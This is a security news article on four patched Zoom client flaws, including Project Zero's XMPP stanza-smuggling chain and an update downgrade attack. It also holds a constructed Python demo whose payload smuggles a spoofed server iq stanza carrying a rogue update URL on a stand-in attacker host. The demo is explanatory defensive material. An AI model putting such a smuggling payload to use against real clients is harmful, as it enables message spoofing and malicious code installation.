Zoom, the popular video conferencing firm, has patched four security flaws that could be used to attack another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and executing malicious code.
The flaws, tracked as CVE-2022-22784 through CVE-2022-22787, range in severity from 5.9 to 8.1. Ivan Fratric of Google Project Zero was credited with discovering and reporting all four issues in February 2022.
The list of bugs is as follows:
CVE-2022-22784 (CVSS score: 8.1) – Improper XML parsing in Zoom Client for Meetings
CVE-2022-22785 (CVSS score: 5.9) – Improperly constrained session cookies in Zoom Client for Meetings
CVE-2022-22786 (CVSS score: 7.5) – Update package downgrade in Zoom Client for Meetings for Windows
CVE-2022-22787 (CVSS score: 5.9) – Insufficient hostname validation during server switch in Zoom Client for Meetings
With Zoom's chat functionality built on top of the XMPP standard, successful exploitation of the issues could allow an attacker to force a vulnerable client to masquerade as a Zoom user, connect to a malicious server, and even download a rogue update, resulting in arbitrary code execution stemming from a downgrade attack.
The zero-click attack sequence was dubbed "XMPP Stanza Smuggling" by Fratric, who stated that "one user could possibly be capable of spoofing messages as if they were coming from another user" and that "an attacker can send control messages that will be accepted as if they were coming from the server."
At its core, the vulnerabilities exploit parsing inconsistencies between Zoom's client and server XML parsers to "smuggle" arbitrary XMPP stanzas – the basic unit of communication in XMPP – to the affected client. The server validates and routes what it parses as one stanza, while the client, parsing the same bytes differently, sees an additional stanza that never passed through the server's checks.
The attack chain, in particular, can be used to hijack the software update mechanism and force the client to connect to a man-in-the-middle server that serves up an older, less secure version of the Zoom client.
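The following is an added, constructed illustration of the parser-differential principle behind stanza smuggling; it is not Zoom's code and not the specific discrepancy Fratric found. It assumes a hypothetical server domain `example.com`, a made-up `urn:demo:update` element, and a deliberately naive client-side tokenizer that does not understand CDATA sections, so that the same bytes the conforming "server" parser treats as one harmless message are seen by the "client" as a message plus a second, server-originated `iq` stanza.

```python
"""Constructed demo of an XMPP stanza-smuggling parser differential.

Added example, not Zoom's code and not the real bug: the server domain,
the update element and the naive client tokenizer are all assumptions.
"""
import re
import xml.etree.ElementTree as ET

SERVER_JID = "example.com"  # assumed server domain for the demo

# Constructed attacker payload. The CDATA section is legal XML, so a
# conforming parser treats everything up to "]]>" as inert text inside
# <body>. A tokenizer that does not know CDATA sees the markup inside it.
SMUGGLED = (
    "<message from='attacker@example.com' to='victim@example.com'>"
    "<body><![CDATA[</body></message>"
    "<iq type='set' from='example.com' id='u1'>"
    "<update xmlns='urn:demo:update' url='http://attacker.invalid/old.pkg'/>"
    "</iq>]]></body></message>"
)


def conforming_parse(data):
    """'Server' side: a conforming XML parser (expat via ElementTree).
    Returns (tag, from) for each top-level stanza in the run."""
    root = ET.fromstring("<stream>" + data + "</stream>")
    return [(child.tag, child.get("from")) for child in root]


_TAG = re.compile(r"<(/?)([A-Za-z][\w:.-]*)([^<>]*?)(/?)>")
_FROM = re.compile(r"""\bfrom=(['"])(.*?)\1""")


def naive_parse(data):
    """'Client' side: a hand-rolled tokenizer that knows nothing about
    CDATA or comments and pairs each start tag with the next end tag."""
    stanzas, depth, current = [], 0, None
    for m in _TAG.finditer(data):
        closing, tag, attrs, selfclose = m.groups()
        if closing:
            if depth > 0:
                depth -= 1
                if depth == 0:
                    stanzas.append(current)
                    current = None
            continue  # stray end tag at depth 0: leniently ignored
        if depth == 0:
            fm = _FROM.search(attrs)
            current = (tag, fm.group(2) if fm else None)
        if selfclose:
            if depth == 0:
                stanzas.append(current)
                current = None
        else:
            depth += 1
    return stanzas


def trusted_server_stanzas(parse, data):
    """Stanzas a client would act on as server control messages: an <iq>
    whose 'from' is the server itself. With the naive parser the attacker's
    message yields one; with the conforming parser it yields none."""
    return [s for s in parse(data) if s[0] == "iq" and s[1] == SERVER_JID]


if __name__ == "__main__":
    print("server sees:", conforming_parse(SMUGGLED))
    print("client sees:", naive_parse(SMUGGLED))
    print("naive client trusts:", trusted_server_stanzas(naive_parse, SMUGGLED))
    print("fixed client trusts:", trusted_server_stanzas(conforming_parse, SMUGGLED))
```

The fix the demo points at is to make the client and server agree on what a stanza is, here by having the client use the same conforming parser, rather than adding a blocklist for one smuggling trick; any construct the two parsers interpret differently (CDATA here, but equally comments, processing instructions or encoding quirks) is a potential smuggling channel.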
While the downgrade attack targets the Windows version of the client, CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 affect Android, iOS, Linux, macOS, and Windows.
The updates arrive less than a month after Zoom addressed two high-severity flaws (CVE-2022-22782 and CVE-2022-22783) that could lead to local privilege escalation and exposure of memory contents in its on-premise Meeting services. Another downgrade attack (CVE-2022-22781) was also fixed in Zoom's macOS app.
Users of the app are advised to update to the latest version (5.10.0) to mitigate any threats arising from exploitation of the flaws. Because CVE-2022-22786 abuses the update mechanism itself, it is worth confirming the installed version directly rather than relying only on the in-app update prompt.